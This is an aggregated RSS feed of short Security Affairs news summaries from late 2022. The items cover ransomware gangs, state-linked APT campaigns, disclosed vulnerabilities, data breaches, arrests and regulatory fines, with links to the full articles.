www.secnews.physaphae.fr
This is the RSS 2.0 feed from www.secnews.physaphae.fr. It is a simple aggregated flow of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr.
Feed generated: 2024-04-25T13:34:17+00:00

Cuba Ransomware received over $60M in ransom payments as of August 2022
The Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide […]
Security Affairs, 2022-12-02T15:20:33+00:00: https://securityaffairs.co/wordpress/139183/cyber-crime/cuba-ransomware-alert-cisa-fbi.html

Android keyboard apps with 2 million downloads can remotely hack your device
Experts found multiple flaws in three Android keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be […]
Security Affairs, 2022-12-02T11:04:39+00:00: https://securityaffairs.co/wordpress/139174/hacking/android-keyboard-apps-flaws.html

New Go-based Redigo malware targets Redis servers
Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers.
Threat actors are exploiting a critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. Redis (remote dictionary server) […]
Security Affairs, 2022-12-01T22:39:51+00:00: https://securityaffairs.co/wordpress/139164/malware/redigo-malware-targets-redis-servers.html

3 of the Worst Data Breaches in the World That Could Have Been Prevented
Data breaches can be devastating for organizations; these are 3 of the worst incidents that could have been prevented. Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible, but some things can be done to reduce it significantly. Here are three of the […]
Security Affairs, 2022-12-01T12:38:04+00:00: https://securityaffairs.co/wordpress/139160/data-breach/worst-data-breaches.html

North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea
The North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by the North Korea-linked ScarCruft group (aka APT37, Reaper, and Group123) in attacks aimed at targets in South Korea.
ScarCruft has been active since at least 2012; it made the headlines in early February 2018 when researchers […]
Security Affairs, 2022-12-01T11:02:51+00:00: https://securityaffairs.co/wordpress/139148/hacking/north-korea-scarcruft-dolphin-backdoor.html

LastPass discloses the second security breach this year
LastPass disclosed a new security breach: threat actors had access to its cloud storage using information stolen in the August 2022 breach. Password management solution LastPass disclosed a new security breach; the attackers had access to a third-party cloud storage service using information stolen in the August 2022 breach. The impacted cloud storage service is […]
Security Affairs, 2022-12-01T07:33:53+00:00: https://securityaffairs.co/wordpress/139136/data-breach/lastpass-second-security-breach.html

Google links three exploitation frameworks to Spanish commercial spyware vendor Variston
Google's Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, TAG spotted an exploitation framework likely linked to Variston IT, a Spanish firm. Officially, Variston claims to provide custom security solutions and custom patches for embedded systems. The […]
Security Affairs, 2022-11-30T21:35:49+00:00: https://securityaffairs.co/wordpress/139126/malware/spanish-spyware-vendor-variston.html

China-linked UNC4191 APT relies on USB devices in attacks against entities in the Philippines
An alleged China-linked cyberespionage group, tracked as UNC4191, used USB devices in attacks aimed at Philippine entities.
Mandiant researchers spotted an alleged China-linked cyberespionage group, tracked as UNC4191, leveraging USB devices as attack vectors in campaigns aimed at Philippine entities. This campaign has been active since at least September 2021 and targeted public […]
Security Affairs, 2022-11-30T11:59:44+00:00: https://securityaffairs.co/wordpress/139097/apt/unc4191-used-usb-devices.html

ENC Security, the encryption provider for Sony and Lexar, leaked sensitive data for over a year
CyberNews experts discovered that ENC Security, a Netherlands software company, had been leaking critical business data since May 2021. Original post at https://cybernews.com/security/encsecurity-leaked-sensitive-data/ When you buy a Sony, Lexar, or SanDisk USB key or any other storage device, it comes with an encryption solution to keep your data safe. The software is developed by a […]
Security Affairs, 2022-11-30T09:06:54+00:00: https://securityaffairs.co/wordpress/139091/data-breach/enc-security-data-leak-sony-lexar.html

Threat actors are offering access to corporate networks via unauthorized Fortinet VPN access
Cyble observed initial access brokers (IABs) offering access to enterprise networks compromised via a critical flaw in Fortinet products. Researchers at Cyble have observed initial access brokers (IABs) selling access to enterprise networks likely compromised via a recently patched critical flaw, tracked as CVE-2022-40684, in Fortinet products.
In early October, Fortinet addressed the critical authentication bypass flaw, […]
Security Affairs, 2022-11-29T22:22:23+00:00: https://securityaffairs.co/wordpress/139085/cyber-crime/iabs-offers-access-via-fortinet-products.html

CISA adds Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities Catalog
CISA added a critical flaw impacting Oracle Fusion Middleware, tracked as CVE-2021-35587, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical vulnerability impacting Oracle Fusion Middleware, tracked as CVE-2021-35587 (CVSS 3.1 base score 9.8), to its Known Exploited Vulnerabilities Catalog. An unauthenticated attacker with network access via HTTP can exploit […]
Security Affairs, 2022-11-29T16:31:33+00:00: https://securityaffairs.co/wordpress/139077/security/oracle-fusion-middleware-flaw-known-exploited-vulnerabilities-catalog.html

Tips for Gamifying Your Cybersecurity Awareness Training Program
In today's technological world, educating people about cybersecurity awareness is an absolute necessity. According to one report, 82% of data breaches involved the human element, from social attacks to misuse of technologies.
These errors are not always entirely preventable, as some level of human error is inevitable, but proper training in cybersecurity awareness can greatly […]
Security Affairs, 2022-11-29T10:04:43+00:00: https://securityaffairs.co/wordpress/139073/security/gamifying-cybersecurity-awareness-training.html

Irish data protection commission fines Meta over 2021 data-scraping leak
The Irish Data Protection Commission (DPC) fined Meta for not protecting Facebook users' data from scraping. Meta has been fined €265 million ($275.5 million) by the Irish DPC for the data leak suffered by Facebook in 2021 that exposed the data belonging to millions of Facebook users. The Data Protection Commission is also imposing […]
Security Affairs, 2022-11-29T07:32:22+00:00: https://securityaffairs.co/wordpress/139063/laws-and-regulations/irish-dpc-fines-meta-data-scraping.html

A flaw in some Acer laptops can be used to bypass security features
ESET announced the discovery of a vulnerability impacting Acer laptops that can allow an attacker to deactivate UEFI Secure Boot. ESET researchers announced in a series of tweets the discovery of a vulnerability impacting Acer laptops; the issue can allow an attacker to deactivate UEFI Secure Boot. The experts explained that the flaw, tracked as […]
Security Affairs, 2022-11-28T20:08:00+00:00: https://securityaffairs.co/wordpress/139055/hacking/acer-flaw-uefi-secure-boot.html

Experts found a vulnerability in AWS AppSync
Amazon Web Services (AWS) fixed a cross-tenant vulnerability that could have allowed attackers to gain unauthorized access to resources.
Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from […]
Security Affairs, 2022-11-28T15:04:34+00:00: https://securityaffairs.co/wordpress/139045/hacking/amazon-web-services-flaw.html

RansomBoggs Ransomware hit several Ukrainian entities, experts attribute it to Russia
Several Ukrainian organizations were hit by the Russia-based RansomBoggs ransomware in the last week, ESET reports. Researchers from ESET observed multiple attacks involving a new family of ransomware, tracked as RansomBoggs, against Ukrainian organizations. The security firm first detected the attacks on November 21 and immediately alerted CERT US. The ransomware is written in […]
Security Affairs, 2022-11-28T08:25:04+00:00: https://securityaffairs.co/wordpress/139028/cyber-warfare-2/ransomboggs-ransomware-targeted-ukraine.html

US FCC bans the import of electronic equipment from Chinese firms
The U.S. Federal Communications Commission announced it will completely ban the import of electronic equipment from Huawei, ZTE, Hytera, Hikvision, and Dahua. The U.S. Federal Communications Commission (FCC) announced a total ban on telecom and surveillance equipment from the Chinese companies Huawei, ZTE, Hytera, Hikvision, and Dahua due to an “unacceptable” national security threat.
The US […]
Security Affairs, 2022-11-27T12:16:06+00:00: https://securityaffairs.co/wordpress/138998/breaking-news/fcc-bans-import-chinese-equipment.html

Data from 5.4M Twitter users obtained from multiple threat actors and combined with data from other breaches
The massive data breach suffered by Twitter that exposed emails and phone numbers of its customers may have impacted more than five million users. At the end of July, a threat actor leaked data of 5.4 million Twitter accounts that were obtained by exploiting a now-fixed vulnerability in the popular social media platform. The threat actor offered […]
Security Affairs, 2022-11-26T21:11:03+00:00: https://securityaffairs.co/wordpress/139001/data-breach/twitter-massive-data-breach.html

Devices from Dell, HP, and Lenovo used outdated OpenSSL versions
Researchers discovered that devices from Dell, HP, and Lenovo are still using outdated versions of the OpenSSL cryptographic library. Binarly researchers discovered that devices from Dell, HP, and Lenovo are still using outdated versions of the OpenSSL cryptographic library. The OpenSSL library provides secure communications over computer networks, protecting against eavesdropping and allowing each party to identify the party at the other end. […]
Security Affairs, 2022-11-26T00:35:53+00:00: https://securityaffairs.co/wordpress/138986/security/dell-hp-lenovo-openssl-outdated.html

Google fixed the eighth actively exploited #Chrome #zeroday this year
Google on Thursday released security updates to address a new zero-day vulnerability, tracked as CVE-2022-4135, impacting the Chrome web browser.
Google rolled out an emergency security update for the desktop version of the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4135, that is actively exploited. The CVE-2022-4135 vulnerability is a heap […]
Security Affairs, 2022-11-25T13:50:56+00:00: https://securityaffairs.co/wordpress/138977/hacking/8-google-chrome-zero-day.html

Experts investigate WhatsApp data leak: 500M user records for sale
Cybernews investigated a data sample available for sale containing up-to-date mobile phone numbers of nearly 500 million WhatsApp users. Original post published by Cybernews: https://cybernews.com/news/whatsapp-data-leak/ On November 16, an actor posted an ad on a well-known hacking community forum, claiming they were selling a 2022 database of 487 million WhatsApp user mobile numbers. The dataset […]
Security Affairs, 2022-11-25T12:20:08+00:00: https://securityaffairs.co/wordpress/138967/data-breach/whatsapp-data-leak-500m.html

An international police operation dismantled the spoofing service iSpoof
An international law enforcement operation has dismantled an online phone number spoofing service called iSpoof. The operation, conducted by authorities in Europe, Australia, the United States, Ukraine, and Canada with the support of Europol, has dismantled the online phone number spoofing service called iSpoof.
The iSpoof service allowed fraudsters to impersonate trusted corporations […]
Security Affairs, 2022-11-25T10:27:00+00:00: https://securityaffairs.co/wordpress/138957/cyber-crime/police-dismantled-spoofing-service-ispoof.html

UK urges to disconnect Chinese security cameras in government buildings
The British government banned the installation of Chinese-linked security cameras at sensitive facilities due to security risks. Reuters reports that the British government ordered its departments to stop installing Chinese security cameras at sensitive buildings due to security risks. The Government has ordered departments to disconnect the cameras from core networks and to consider removing […]
Security Affairs, 2022-11-25T06:35:47+00:00: https://securityaffairs.co/wordpress/138945/digital-id/uk-ban-chinese-security-cameras.html

RansomExx Ransomware upgrades to Rust programming language
RansomExx is the latest ransomware to get a version written entirely in the Rust programming language. The operators of the RansomExx ransomware (aka Defray777 and Ransom X) have developed a new variant of their malware, tracked as RansomExx2, that was ported to the Rust programming language. The move follows the […]
Security Affairs, 2022-11-24T21:19:37+00:00: https://securityaffairs.co/wordpress/138933/malware/ransomexx-ransomware-rust-language.html

An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware
Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US.
Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. In the last two […]
Security Affairs, 2022-11-24T09:59:26+00:00: https://securityaffairs.co/wordpress/138924/cyber-crime/qakbot-campaign-black-basta-ransomware.html

Threat actors exploit discontinued Boa web servers to target critical infrastructure
Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that the threat actors behind a malicious campaign aimed at Indian critical infrastructure earlier this year exploited security flaws in a now-discontinued web server called Boa. The Boa web server is widely used across a […]
Security Affairs, 2022-11-24T08:46:59+00:00: https://securityaffairs.co/wordpress/138916/hacking/boa-web-servers-attacks.html

Pro-Russian group Killnet claims responsibility for DDoS attack that has taken down the European Parliament site
The pro-Russian hacker collective Killnet took down the European Parliament website with a DDoS cyberattack. The pro-Russia hacktivist group Killnet claimed responsibility for the DDoS attack that today took down the website of the European Parliament. “KILLNET officially recognises the European Parliament as sponsors of homosexualism,” states the group.
The attack was launched immediately […]
Security Affairs, 2022-11-23T21:20:11+00:00: https://securityaffairs.co/wordpress/138906/hacktivism/killnet-ddos-european-parliament.html

Ducktail information stealer continues to evolve
The operators behind the Ducktail information stealer continue to improve their malicious code, experts warn. In late July 2022, researchers from WithSecure (formerly F-Secure Business) discovered an ongoing operation, named DUCKTAIL, that was targeting individuals and organizations that operate on Facebook's Business and Ads platform. Experts attribute the campaign to a Vietnamese financially motivated […]
Security Affairs, 2022-11-23T18:53:23+00:00: https://securityaffairs.co/wordpress/138894/cyber-crime/ducktail-information-stealer-evolution.html

Experts claim that iPhone's analytics data is not anonymous
Security Affairs, 2022-11-23T13:58:24+00:00: https://securityaffairs.co/wordpress/138884/digital-id/iphone-found-collecting-personal-data.html

Microsoft releases out-of-band update to fix Kerberos auth issues caused by a patch for CVE-2022-37966
Microsoft released an out-of-band update to fix problems tied to a recent Windows security patch that caused Kerberos authentication issues. Microsoft released an out-of-band update to address issues caused by a recent Windows security patch that causes Kerberos authentication problems.
Microsoft Patch Tuesday security updates for November 2022 addressed a privilege escalation vulnerability, tracked as CVE-2022-37966, […]
Security Affairs, 2022-11-23T10:28:38+00:00: https://securityaffairs.co/wordpress/138869/security/out-of-band-fix-kerberos-issues.html

Exclusive – Quantum Locker lands in the Cloud
The gang behind Quantum Locker used a particular modus operandi to target large enterprises relying on cloud services in the NACE region. Executive Summary. Incident Insights: during the latest weeks, the Belgian company Computerland shared insights with the European threat intelligence community about Quantum TTPs adopted in recent attacks. The shared information revealed that the Quantum gang […]
Security Affairs, 2022-11-23T08:15:59+00:00: https://securityaffairs.co/wordpress/138873/cyber-crime/quantum-locker-lands-in-the-cloud.html

5 API Vulnerabilities That Get Exploited by Criminals
Let's take a look at API vulnerabilities by reading the API Security Top 10 published by the Open Web Application Security Project (OWASP). It's no secret that cyber security has become a leading priority for most organizations, especially those in industries that handle sensitive customer information. And as these businesses work towards building robust […]
Security Affairs, 2022-11-22T23:17:10+00:00: https://securityaffairs.co/wordpress/138879/security/5-api-vulnerabilities.html

Researcher warns that Cisco Secure Email Gateways can easily be circumvented
A researcher revealed how to bypass some of the filters in the Cisco Secure Email Gateway appliance and deliver malware using specially crafted emails.
An anonymous researcher publicly disclosed a series of techniques to bypass some of the filters in the Cisco Secure Email Gateway appliance and deliver malware using specially crafted emails. The researcher pointed out […]
Security Affairs, 2022-11-22T19:04:22+00:00: https://securityaffairs.co/wordpress/138859/security/cisco-secure-email-gateways-bypass.html

Aurora Stealer Malware is becoming a prominent threat in the cybercrime ecosystem
Researchers warn of threat actors employing a new Go-based malware dubbed Aurora Stealer in attacks in the wild. Aurora Stealer is an info-stealing malware that was first advertised on Russian-speaking underground forums in April 2022. Aurora was offered as Malware-as-a-Service (MaaS) by a threat actor known as Cheshire. It is a multi-purpose botnet with data-stealing […]
Security Affairs, 2022-11-22T15:20:06+00:00: https://securityaffairs.co/wordpress/138851/malware/aurora-stealer-malware.html

Two Estonian citizens arrested in $575M cryptocurrency fraud scheme
Two Estonian citizens were arrested in Tallinn for allegedly running a $575 million cryptocurrency fraud scheme. Two Estonian nationals were arrested in Tallinn, Estonia, after being indicted in the US for running a fraudulent cryptocurrency Ponzi scheme that caused more than $575 million in losses.
According to the indictment, Sergei Potapenko and Ivan Turõgin, both […]
Security Affairs, 2022-11-22T10:56:32+00:00: https://securityaffairs.co/wordpress/138823/cyber-crime/estonian-575m-cryptocurrency-fraud-scheme.html

Emotet is back and delivers payloads like IcedID and Bumblebee
The Emotet malware is back and experts warn of a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. Proofpoint researchers warn of the return of the Emotet malware; in early November the experts observed a high-volume malspam campaign delivering payloads like IcedID and Bumblebee. The Emotet banking trojan has been active at least since 2014; the botnet is […]
Security Affairs, 2022-11-22T08:39:56+00:00: https://securityaffairs.co/wordpress/138824/cyber-crime/emotet-is-back-nov-2022.html

Expert published PoC exploit code for macOS sandbox escape flaw
A researcher published details and proof-of-concept (PoC) code for a high-severity macOS sandbox escape vulnerability tracked as CVE-2022-26696. Researcher Wojciech Reguła (@_r3ggi) of SecuRing published technical details and proof-of-concept (PoC) code for a macOS sandbox escape vulnerability tracked as CVE-2022-26696 (CVSS score of 7.8). In a wrap-up published by Reguła, the researcher observed that the problem is caused […]
Security Affairs, 2022-11-21T21:19:22+00:00: https://securityaffairs.co/wordpress/138815/hacking/macos-sandbox-escape-flaw.html

Google won a lawsuit against the Glupteba botnet operators
Google won a lawsuit filed against two Russian nationals involved in the operations of the Glupteba botnet. This week, Google announced it has won a nearly year-long legal battle against the Glupteba botnet.
Glupteba is a highly sophisticated botnet composed of millions of compromised Windows devices. Unlike other botnets, Glupteba leverages cryptocurrency blockchains as a command-and-control mechanism […]
Security Affairs, 2022-11-21T14:33:21+00:00: https://securityaffairs.co/wordpress/138803/cyber-crime/google-lawsuit-glupteba-botnet-operators.html

Google provides rules to detect tens of cracked versions of Cobalt Strike
Researchers at Google Cloud identified 34 different cracked release versions of the Cobalt Strike tool in the wild. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. The Beacon includes a wealth of functionality for the attacker, including, but not limited to […]
Security Affairs, 2022-11-21T11:41:21+00:00: https://securityaffairs.co/wordpress/138795/hacking/google-cobalt-strike-detection.html

Octocrypt, Alice, and AXLocker Ransomware, new threats in the wild
Experts from Cyble Research and Intelligence Labs (CRIL) discovered three new ransomware families: AXLocker, Octocrypt, and Alice Ransomware. Threat intelligence firm Cyble announced the discovery of three new ransomware families named AXLocker, Octocrypt, and Alice Ransomware. The AXLocker ransomware encrypts victims’ files and steals Discord tokens from the infected machine. The analysis of the code […]
Security Affairs, 2022-11-21T08:31:12+00:00: https://securityaffairs.co/wordpress/138783/malware/octocrypt-alice-axlocker-ransomware.html

PoC exploit code for ProxyNotShell Microsoft Exchange bugs released online
Proof-of-concept exploit code for two actively exploited Microsoft Exchange ProxyNotShell flaws was released online.
Proof-of-concept exploit code has been released online for two actively exploited vulnerabilities in Microsoft Exchange, known as ProxyNotShell. The two flaws impact Exchange Server 2013, 2016, and 2019; an authenticated attacker can trigger them to elevate privileges to run PowerShell […]
Security Affairs, 2022-11-20T19:39:40+00:00: https://securityaffairs.co/wordpress/138768/hacking/proxynotshell-microsoft-exchange-poc.html

DEV-0569 group uses Google Ads to distribute Royal Ransomware
Microsoft warns that a threat actor, tracked as DEV-0569, is using Google Ads to distribute the recently discovered Royal ransomware. Researchers from the Microsoft Security Threat Intelligence team warned that a threat actor, tracked as DEV-0569, is using Google Ads to distribute various payloads, including the recently discovered Royal ransomware. The DEV-0569 group carries out […]
Security Affairs, 2022-11-19T19:27:12+00:00: https://securityaffairs.co/wordpress/138750/malware/dev-0569-google-ads-royal-ransomware.html

Black Friday and Cyber Monday, crooks are already at work
Every year during Black Friday and Cyber Monday, crooks take advantage of the bad habits of users with fraudulent schemes. Researchers at Bitdefender Antispam Lab have analyzed over the last weeks the fraudulent activities associated with Black Friday and Cyber Monday.
The experts noticed that between October 26 and November 6, the rate of unsolicited […]
Security Affairs, 2022-11-19T15:56:56+00:00: https://securityaffairs.co/wordpress/138737/cyber-crime/black-friday-and-cyber-monday-scams.html

New improved versions of LodaRAT spotted in the wild
Cisco Talos spotted multiple updated versions of LodaRAT that were deployed alongside other malware families, including RedLine and Neshta. Researchers from Cisco Talos have monitored the LodaRAT malware over the course of 2022 and recently discovered multiple updated versions that have been deployed alongside other malware families, including RedLine and Neshta. The versions include new […]
Security Affairs, 2022-11-19T09:22:01+00:00: https://securityaffairs.co/wordpress/138723/malware/lodarat-malware.html

Atlassian fixed 2 critical flaws in Crowd and Bitbucket products
Atlassian addressed this week two critical vulnerabilities impacting its Crowd and Bitbucket products. Atlassian announced the release of security updates to address critical-severity vulnerabilities in its identity management platform, Crowd Server and Data Center, and in Bitbucket Server and Data Center, a self-managed solution that provides source code collaboration for professional teams. The vulnerability in […]
Security Affairs, 2022-11-18T21:35:51+00:00: https://securityaffairs.co/wordpress/138716/security/atlassian-critical-flaws-crowd-bitbucket.html

Hive Ransomware extorted over $100M in ransom payments from over 1,300 companies
Hive ransomware operators have extorted over $100 million in ransom payments from over 1,300 companies worldwide as of November 2022.
The threat actors behind the Hive ransomware-as-a-service (RaaS) have extorted $100 million in ransom payments from over 1,300 companies worldwide as of November 2022, reported the U.S. cybersecurity and intelligence authorities. “As of November 2022, […]
Security Affairs, 2022-11-18T11:30:22+00:00: https://securityaffairs.co/wordpress/138702/cyber-crime/hive-ransomware-extorted-100m.html

Ongoing supply chain attack targets Python developers with WASP Stealer
A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they track as WASP that is targeting Python developers. The attackers are using Python packages to distribute a polymorphic malware called W4SP […]
Security Affairs, 2022-11-18T08:24:14+00:00: https://securityaffairs.co/wordpress/138692/cyber-crime/wasp-stealer-supply-chain-attack.html

China-based Fangxiao group behind a long-running phishing campaign
A China-based financially motivated group, tracked as Fangxiao, is behind a large-scale phishing campaign dating back as far as 2019. Researchers from Cyjax reported that a China-based financially motivated group, dubbed Fangxiao, has orchestrated a large-scale phishing campaign since 2017.
The sophisticated phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including […]
2022-11-18T06:19:04+00:00 https://securityaffairs.co/wordpress/138683/cyber-crime/fangxiao-phishing-campaign.html

Two public schools in Michigan hit by a ransomware attack
Public schools in two Michigan counties were forced to halt their activities, including lessons, after a ransomware attack. Public schools in Jackson and Hillsdale counties, Michigan, reopened after a closure of two days caused by a ransomware attack that hit their systems. The public schools started experiencing a systems outage affecting critical operating […]
2022-11-17T22:25:09+00:00 https://securityaffairs.co/wordpress/138677/cyber-crime/public-schools-michigan-ransomware.html

Magento and Adobe Commerce websites under attack
Researchers warn of a surge in cyberattacks targeting CVE-2022-24086, a pre-authentication issue impacting Adobe Commerce and Magento stores. In September 2022, Sansec researchers warned of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086. Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands […]
2022-11-17T16:32:32+00:00 https://securityaffairs.co/wordpress/138663/cyber-crime/trojanorders-attacks-adobe-commerce-magento.html

Tank, the leader of the Zeus cybercrime gang, was arrested by the Swiss police
A suspected leader of the Zeus cybercrime gang, Vyacheslav Igorevich Penchukov (aka Tank), was arrested by Swiss police.
Swiss police last month arrested in Geneva Vyacheslav Igorevich Penchukov (40), also known as Tank, who is one of the leaders of the JabberZeus cybercrime group. “Vyacheslav “Tank” Penchukov, the accused 40-year-old Ukrainian leader of a prolific cybercriminal […]
2022-11-17T10:21:02+00:00 https://securityaffairs.co/wordpress/138648/cyber-crime/zeus-gang-leader-arrested.html

Iran-linked threat actors compromise US Federal Network
Iran-linked threat actors compromised a Federal Civilian Executive Branch organization using a Log4Shell exploit and installed cryptomining malware. According to a joint advisory published by the FBI and CISA, an Iran-linked APT group compromised a Federal Civilian Executive Branch (FCEB) organization using an exploit for the Log4Shell flaw (CVE-2021-44228) and deployed cryptomining malware. Log4Shell impacts […]
2022-11-17T07:58:03+00:00 https://securityaffairs.co/wordpress/138639/apt/iran-compromises-us-federal-network.html

F5 fixed 2 high-severity Remote Code Execution bugs in its products
Researchers at cybersecurity firm Rapid7 have identified several vulnerabilities and other potential security issues affecting F5 products. Rapid7 researchers discovered several vulnerabilities in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS. The experts also discovered several bypasses of security controls that the security vendor F5 does not recognize as exploitable vulnerabilities.
The […]
2022-11-16T22:02:34+00:00 https://securityaffairs.co/wordpress/138631/security/2-rce-f5-products.html

Lazarus APT uses DTrack backdoor in attacks against LATAM and European orgs
North Korea-linked Lazarus APT is using a new version of the DTrack backdoor in attacks aimed at organizations in Europe and Latin America. North Korea-linked APT Lazarus is using a new version of the DTrack backdoor to attack organizations in Europe and Latin America, Kaspersky researchers warn. DTrack is a modular backdoor used by the […]
2022-11-16T18:50:05+00:00 https://securityaffairs.co/wordpress/138622/apt/dtrack-backdoor-targets-europe-latin-america.html

New RapperBot Campaign targets game servers with DDoS attacks
Fortinet researchers discovered new samples of RapperBot used to build a botnet that launches distributed denial-of-service (DDoS) attacks against game servers. Fortinet FortiGuard Labs researchers have discovered new samples of the RapperBot malware that are being used to build a DDoS botnet to target game servers. Researchers from FortiGuard Labs discovered the previously undetected RapperBot IoT […]
2022-11-16T11:39:15+00:00 https://securityaffairs.co/wordpress/138615/malware/rapperbot-botnet-targets-game-servers.html

Beginning 2023 Google plans to roll out the initial Privacy Sandbox Beta
Google announced it will roll out the Privacy Sandbox system for Android in beta to a limited number of Android 13 devices in early 2023. Google announced it will roll out the Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
The Privacy Sandbox aims at creating technologies to […]
2022-11-16T08:18:48+00:00 https://securityaffairs.co/wordpress/138607/mobile-2/google-android-privacy-sandbox.html

Happy birthday Security Affairs … 11 years together!
2022-11-15T23:16:16+00:00 https://securityaffairs.co/wordpress/138600/breaking-news/happy-birthday-security-affairs-11.html

Experts found critical RCE in Spotify's Backstage
Researchers discovered a critical vulnerability impacting Spotify's Backstage Software Catalog and Developer Platform. Researchers from the security firm Oxeye discovered a critical remote code execution vulnerability in Spotify's Backstage (CVSS score 9.8). Backstage is Spotify's open-source platform for building developer portals; it is used by several organizations, including American Airlines, Netflix, Splunk, Fidelity Investments and Epic Games. […]
2022-11-15T22:23:01+00:00 https://securityaffairs.co/wordpress/138591/security/spotify-backstage-rce.html

Experts revealed details of critical SQLi and access issues in Zendesk Explore
Researchers disclosed technical details of critical SQLi and access vulnerabilities in the Zendesk Explore service. Cybersecurity researchers at Varonis disclosed technical details of critical SQLi and access vulnerabilities impacting the Zendesk Explore service. Zendesk Explore allows organizations to view and analyze key information about their customers and their support resources.
Threat actors would have allowed […]
2022-11-15T16:16:40+00:00 https://securityaffairs.co/wordpress/138579/hacking/zendesk-explore-critical-flaws.html

China-linked APT Billbug breached a certificate authority in Asia
A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part of a cyber espionage campaign aimed at multiple government agencies in the region, Symantec warns. Symantec attributes […]
2022-11-15T14:08:12+00:00 https://securityaffairs.co/wordpress/138568/apt/billbug-apt-hit-certificate-authority.html

Google to Pay a record $391M fine for misleading users about the collection of location data
Google is going to pay $391.5 million to settle with 40 states in the U.S. for secretly collecting personal location data. Google has agreed to pay $391.5 million to settle with 40 US states for misleading users about the collection of personal location data. The settlement is the largest attorney general-led consumer privacy settlement ever, […]
2022-11-15T10:16:53+00:00 https://securityaffairs.co/wordpress/138555/reports/google-settlement-personal-location-data.html

Previously undetected Earth Longzhi APT group is a subgroup of APT41
Trend Micro reported that the Earth Longzhi group, a previously undocumented subgroup of APT41, targets Ukraine and Asian countries. Earlier this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed a custom Cobalt Strike loader in the attack.
Further analysis revealed that the same threat actor targeted multiple regions […]
2022-11-15T08:46:34+00:00 https://securityaffairs.co/wordpress/138536/apt/earth-longzhi-subgroup-apt41.html

Avast details Worok espionage group's compromise chain
2022-11-15T08:33:20+00:00 https://securityaffairs.co/wordpress/138550/apt/worok-apt-dropbox-api.html

KmsdBot, a new evasive bot for cryptomining activity and DDoS attacks
Researchers spotted a new evasive malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak credentials. Akamai Security Research discovered a new evasive Golang-based malware, tracked as KmsdBot, that infects systems via an SSH connection that uses weak login credentials. The malware was employed in cryptocurrency mining campaigns and to launch […]
2022-11-14T12:52:52+00:00 https://securityaffairs.co/wordpress/138514/malware/kmsdbot-golang-malware.html

CERT-UA warns of multiple Somnia ransomware attacks against organizations in Ukraine
Russian threat actors employed a new ransomware family called Somnia in attacks against multiple organizations in Ukraine. The Government Computer Emergency Response Team of Ukraine (CERT-UA) is investigating multiple attacks against organizations in Ukraine that involved a new piece of ransomware called Somnia.
Government experts attribute the attacks to the group ‘From Russia with Love’ […]
2022-11-14T09:18:41+00:00 https://securityaffairs.co/wordpress/138496/hacking/somnia-ransomware-attacks-ukraine.html

Have board directors any liability for a cyberattack against their company?
Are the directors of a company hit by a cyberattack liable for negligence in failing to take steps to limit the risk? As the risk of a cyberattack grows, it is pivotal to consider whether the directors of a company hit by a ransomware attack, for example, can bear any liability for negligence in failing […]
2022-11-14T09:12:55+00:00 https://securityaffairs.co/wordpress/138507/security/board-directors-liability-for-cyberattack.html

Ukraine Police dismantled a transnational fraud group that made €200 million per year
Ukraine's Cyber Police and Europol arrested 5 Ukrainian citizens who are members of a large-scale transnational fraud group. Ukraine's cyber police and Europol arrested five members of a transnational fraud group that caused more than €200 million in losses per year. The arrests are the results of a joint operation conducted with the support of law […]
2022-11-13T12:18:05+00:00 https://securityaffairs.co/wordpress/138481/cyber-crime/ukraine-police-dismantled-fraud-group.html

Lockbit gang leaked data stolen from global high-tech giant Thales
The Lockbit 3.0 ransomware gang started leaking the information allegedly stolen from the global high-tech company Thales. Thales is a global high-tech leader with more than 81,000 employees worldwide.
The Group invests in digital and deep tech innovations (big data, artificial intelligence, connectivity, cybersecurity and quantum) to build a future of trust, essential […]
2022-11-13T09:40:52+00:00 https://securityaffairs.co/wordpress/138471/data-breach/lockbit-leaked-thales-files.html

